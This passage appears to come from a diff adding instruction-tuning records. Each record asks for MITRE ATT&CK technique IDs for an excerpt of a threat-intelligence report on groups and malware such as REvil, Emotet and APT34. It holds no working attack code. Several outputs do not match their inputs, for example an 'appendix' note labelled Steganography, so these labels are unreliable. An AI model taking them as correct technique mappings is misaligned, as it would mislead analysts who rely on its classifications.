first lateral movement occurred to the domain controller not affected by the use of CVE-2020-1472. An executable was transferred to it via SMB using a domain administrator account", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The tools uploaded to the webshells range from legitimate applications such as cURL to post-exploitation tools such as Mimikatz. We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda", + "output": "- T1046: Network Service Discovery\n- T1588.002: Obtain Capabilities - Tool\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. This campaign targets organizations in South Asia. ObliqueRAT has been linked to the Transparent Tribe APT group in the past. This campaign hides the ObliqueRAT payload in seemingly benign image files hosted on compromised websites", + "output": "- T1204.002: User Execution - Malicious File\n- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This is used to maintain access to a Meterpreter session. It is saved to C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msupdateconf.exe, granting the executable persistence. Another custom executable used to execute PowerShell scripts. The Mosquito JScript backdoor that uses Google Apps Script as its C&C server. Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "REvil sends the encrypted stat data containing the host profile and malware information to the C2 URL via the HTTP POST method. Detection of the associated network traffic is challenging because REvil uses the HTTPS protocol, which encrypts the network communication. The malware reads the subsequent C2 server response but implements no logic to act on the received data. Finally, REvil terminates execution", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DEATHRANSOM is written in C while the other two families are written in C++. DEATHRANSOM uses a distinct series of do/while loops to enumerate through network resources, logical drives, and directories", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Taking advantage of the unprotected open Docker API port, the attackers are able to instantiate an Ubuntu container with the following entry point", + "output": "- T1609: Container Administration Command" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) NetPass.exe is a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. 3) WebBrowserPassView is a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. 4) Mail PassView is a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo. Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet\u2019s access to SMB can result in the infection of entire domains (servers and clients", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This exception invokes the exception handler containing the HTTP communication code, allowing it to run. If either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie. If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. random number between 100000 and 999999>.<c2 name> This request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake. The script will first attempt to communicate with the C2 server using HTTPS (HTTP if unsuccessful), which involves GET requests using the session ID within the request's cookie in the PHPSESSID field, as seen in the example GET request", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Let's use the example data 8,54351-1616479009,0 from a beacon sent from the payload to the C2, which it will encode using base64 to OCw1NDM1MS0xNjE2NDc5MDA5LDA=, append the @ symbol and embed within a BMP image. The 8-bits of this base2 representation are then used to set specific bits within the 3-bytes for each pixel", + "output": "- T1027.003: Obfuscated Files or Information - Steganography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After all of the data is gathered, the malware starts communication with the C&C server by periodically sending HTTP POST requests to the following URL on the received domain", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first evidence of its intrusion dated from May 6, 2015 but activity appeared to have begun in earnest on May 12. The attackers appeared to be interested in one division of the ministry that is responsible for relations with the Asia-Pacific region. They attempted to extract all Word documents stored on a file server belonging to this division by bundling them into a RAR archive by running the following command", + "output": "- T1039: Data from Network Shared Drive\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware has evolved over time", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While historically TA416 has delivered Zip files from cloud hosting providers containing a decoy file, legitimate PE file, a DLL loader, and a PlugX malware configuration DAT file, recent campaigns used a different tactic. Proofpoint researchers noted that the malicious Zip files delivered from DropBox now contain a rudimentary executable which is a dropper malware. This malware establishes persistence for a legitimate executable file used in DLL search order hijacking, as well as initiates the download of four components. These components are included below and resemble the components used in the past to install PlugX malware. Public research has previously documented TA416\u2019s propensity for including PlugX Trident Loader components and decoy in the initial delivered Zip file. The method of installing PlugX via DLL Search Order hijacking that displays a PDF decoy remains constant", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uid= and writes a JSS Loader binary to %TEMP%\\PaintHelper.exe. JSS Loader, which has both .NET and C++ versions, has multiple capabilities, including the ability to load additional executables, PowerShell (PS) and JavaScript (JS) files", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1105: Ingress Tool Transfer\n- T1059.007: Command and Scripting Interpreter - JavaScript" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The actor behind Bisonal is clearly motivated and has an interest in Russian, Korean and Japanese victims. The development of Bisonal has been active for more than a decade. However, specific functions are still used today, many years after the original implementation of the Bional malware. Even if Bisonal could be considered as simple with less than 30 functions, it has spent its life targeting sensitive entities in both the public and private sectors. For example, in one campaign they put the domain name of the C2 server in plaintext in the malware which had the function to generate a non-ASCII string for the C2 servers once decoded. In this condition, the malware cannot work on the compromised system. With this investigation and the analysis of this decade of activity, we hope to force this actor to innovate by providing a better understanding of his arsenal and more specifically how Bisonal works", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TA505 briefly distributed the Kegotip information stealer in April 2017. Across two campaigns of several million messages each, the actor used both macro-laden Microsoft Word documents and zipped VBScript attachments to install the Trojan on potential victim PCs. Kegotip is an infostealer (credentials and email addresses) used to facilitate other crimeware activities. It steals credentials from various FTP clients, Outlook, and Internet Explorer. It also will gather email addresses scraped from files stored on the computer. This information can be used to facilitate future spam campaigns by the perpetrator or may be sold to other actors", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Note: see the appendix for a list of the domains, file names, and malware MD5 hash values used to facilitate this activity", + "output": "- T1027.003: Obfuscated Files or Information - Steganography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Register as a startup program in HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run if it has no privileged (Figure 6). Otherwise, it will register itself as a system service (Figure 7", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The two resources that contain commands that ISMInjector uses for persistence are named \u201cTsk1\u201d and \u201cTsk2\u201d. The specific commands within each of these resources are within Table 1. At a high level, the\u201cTsk1\u201d command creates a scheduled task named \u201cReportHealth\u201d that is meant to run a payload saved to \"\"%localappdata%\\srvHealth.exe\u201d every 4 minutes. The \u201cTsk2\u201d command creates a scheduled task that runs every 2 minutes that is responsible for saving the payload to srvHealth.exe. This task saves the payload to this location using the \u201ccertutil\u201d command to decode the original payload saved to \u201csrvBS.txt\"", + "output": "- T1140: Deobfuscate/Decode Files or Information\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap", + "output": "- T1027: Obfuscated Files or Information\n- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we\u00a0published\u00a0a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The encryption style does not differ significantly from other prominent ransomware families. WastedLocker will attempt to encrypt files on local as well as remote (network adjacent and accessible) and removable drives. Once the eligible drives are located, the ransomware will begin the encryption process", + "output": "- T1120: Peripheral Device Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It implements a simple custom-built virtual machine mechanism that will execute an embedded bytecode to decode and inject the payload into memory", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tonto Team is an APT group active since at least 2009 and targeting governments and institutions mostly based in Russia, Japan and Mongolia. For more than ten years, Tonto Team has been using the Bisonal RAT. Tonto Team is one of the APT groups that now has access to the ShadowPad backdoor", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1505.003: Server Software Component - Web Shell\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Bazar loader files are dual-extension executable files (such as PreviewReport.DOC.exe) signed with fake certificates such as VB CORPORATE PTY. This is consistent with the Trickbot group, which notoriously abuses the trust of certificate authorities by using signed loaders and malware to evade security product detection", + "output": "- T1036.007: Masquerading - Double File Extension" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In addition to loading the communications module, the initial macro described above configures a persistence mechanism for this malware loader by setting up\u202fa\u202fRegistry\u202fRun key. The non-concatenated command included in the macro that establishes persistence for Libcurl.dll and the hash for this sample are included below", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Operation North Star C2 infrastructure consisted of compromised domains in Italy and other countries. Compromised domains belonged, for example, to an apparel company, an auction house and printing company. These URLs hosted malicious DOTM files, including a malicious ASP page", + "output": "- T1608.001: Stage Capabilities - Upload Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). The signature was signed with a code signing certificate purchased by the same user as the SSL certificate for jmttrading[.]org (Obtain Capabilities: Code Signing Certificates [T1588.003]). The MSI Installer asks the victim for administrative privileges to run (User Execution: Malicious File [T1204.002", + "output": "- T1588.004: Obtain Capabilities - Digital Certificates" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These platforms are used to exfiltrate documents and receive instructions. Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire. The tokens for each platform are hardcoded within the sample", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware\u2019s behavior", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials. Seedworm uses off-the-shelf, unmodified versions of these tools as well as custom-compiled variants which we have determined are only used by this group", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The encrypted request includes a PC identifier and timestamp, and optionally some other data. It is worth noting that the RC2FM module uses a number of encryption methods (variations of a simple XOR encryption routine), unlike the other InvisiMole parts", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In these cases, the temporary file is written to the %TEMP% directory, and the filename is a combination of numbers generated from a call to GetTickCount and the '.dat' extension (e.g", + "output": "- T1218.011: System Binary Proxy Execution - Rundll32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the past, this APT has relied on Hangul Office documents (hwp files) to target victims, as it\u2019s software that\u2019s commonly used in South Korea. However, in this blog we describe an interesting alternative method, delivered via self-decoding VBA Office files", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Post-compromise, APT39 leverages custom backdoors such as SEAWEED, CACHEMONEY, and a unique variant of POWBAT to establish a foothold in a target environment. Internal reconnaissance has been performed using custom scripts and both freely available and custom tools such as the port scanner, BLUETORCH", + "output": "- T1059: Command and Scripting Interpreter\n- T1046: Network Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this 